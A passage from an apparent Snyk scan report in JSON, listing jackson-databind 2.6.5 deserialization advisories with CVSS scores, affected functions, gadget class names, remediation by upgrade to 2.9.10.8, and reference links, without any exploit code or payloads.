The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36187" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T12:47:33.579319Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T12:44:41Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": 
"jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.970819Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.768509Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36184", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.169091Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36184" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:02:15.197495Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2021-01-07T16:40:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.700251Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - "cvssSources": 
[ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.214306Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36186" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:05:16.831143Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.206083Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.695573Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": 
"high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.249724Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36180" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:08:29.105792Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:05:51Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.705041Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3003", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": 
"3.1", - "modificationTime": "2024-03-06T13:59:37.268380Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36183" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:11:36.206859Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:10:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.627750Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.831271Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
